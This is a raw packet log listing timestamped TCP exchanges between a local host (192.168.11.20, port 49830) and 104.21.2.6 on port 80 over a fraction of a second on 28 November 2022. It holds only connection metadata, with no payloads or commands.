Nov 28, 2022 16:37:04.349865913 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349879026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349893093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349905968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349919081 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349939108 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349953890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349967957 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.349972010 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.349987030 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.350001097 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.350013971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.350145102 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.350145102 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.350337029 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.350591898 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.358541965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358679056 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358694077 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358710051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358728886 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358741045 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358756065 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358768940 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358781099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358793020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358805895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358819008 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358830929 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358843088 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358855963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358867884 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358880997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358892918 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358906031 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.358921051 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.358921051 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.359086990 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.359124899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359148026 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359163046 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359175920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359188080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359200954 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359211922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359221935 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.359256029 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.359453917 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.359596968 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.368860960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369009018 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.369169950 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369196892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369216919 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369235992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369252920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369263887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369275093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369285107 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369296074 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369306087 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369317055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369327068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369338036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369349003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369359016 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.369369984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369379997 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369390965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369401932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369412899 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369424105 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369435072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369446039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369456053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369474888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369488955 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369499922 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369510889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369522095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369539976 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369560003 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369577885 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.369577885 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.369592905 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369606972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369618893 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369631052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369646072 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369669914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369685888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369698048 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369709969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369720936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369746923 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.369838953 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369852066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369863987 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369875908 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369887114 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369899035 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369910002 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369918108 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.369930029 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369947910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369961977 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369972944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.369985104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370002985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370023966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370042086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370055914 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370068073 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370079994 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370083094 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.370083094 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.370099068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370110989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370121956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370132923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370143890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370156050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370167971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370250940 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.370373011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370384932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370397091 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370409012 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370423079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370434999 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370446920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370459080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370470047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370481968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370493889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370505095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370517015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370528936 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370539904 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370552063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370563984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370574951 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370587111 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370589018 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.370603085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370632887 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370644093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.370763063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.370763063 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.370919943 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.378580093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.378720045 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.378870964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.378900051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.378921032 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.378943920 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.378967047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.378988981 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379008055 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379029989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379050016 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379060030 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.379081011 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379095078 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379107952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379110098 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.379125118 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379136086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379148006 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379159927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379170895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379183054 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379194975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379205942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379218102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379230022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379259109 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379271984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379276991 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.379300117 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379312992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379323959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379336119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379348040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379359007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379370928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379384041 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379400969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.379451036 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.379451036 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.379625082 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.385356903 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385546923 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.385668039 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385683060 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385695934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385708094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385720015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385732889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385751963 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385771990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385791063 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385804892 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385817051 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385828972 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385839939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385852098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385854959 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.385870934 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385883093 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385895014 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385902882 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.385911942 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385924101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385935068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385946989 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385958910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385970116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385982037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.385992050 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386003971 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386075974 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.386099100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386111975 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386123896 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386135101 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386147022 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386157990 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386169910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386181116 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386193037 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386204004 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386215925 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386228085 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386239052 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386243105 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.386243105 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.386259079 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386276960 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386297941 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386317015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386329889 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386342049 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386353970 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386365891 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386377096 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386389017 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386399984 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386410952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386415958 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.386430979 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386440992 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.386600971 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.391856909 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.391979933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.391994953 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.392014980 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392035007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392080069 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392103910 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392229080 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392246008 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.392246008 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.392246008 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.392246008 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.392275095 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392301083 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392327070 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.392463923 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.392463923 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.392632961 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.397417068 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397531986 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397546053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397564888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397577047 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397588015 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397598982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397627115 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397634029 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.397639036 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397680998 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397691965 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397702932 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397720098 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397735119 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397747040 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397758007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397769928 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.397775888 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397789001 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397799969 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397809982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397828102 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397841930 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397851944 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397862911 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397881985 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397892952 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397902966 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397913933 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397931099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397938013 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.397938013 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.397944927 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397955894 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397967100 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.397984982 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398000956 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398011923 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398022890 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398041964 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398053885 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398081064 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398097038 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398108959 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398113012 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.398119926 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398132086 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398143053 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398154020 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398164988 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.398277998 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.398340940 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.404690027 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404802084 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404817104 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404835939 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404848099 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404859066 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404870033 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404886007 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404897928 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.404908895 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405049086 CET	49830	80	192.168.11.20	104.21.2.6
Nov 28, 2022 16:37:04.405057907 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405071974 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405090094 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405102968 CET	80	49830	104.21.2.6	192.168.11.20
Nov 28, 2022 16:37:04.405113935 CET	80	49830	104.21.2.6	192.168.11.20
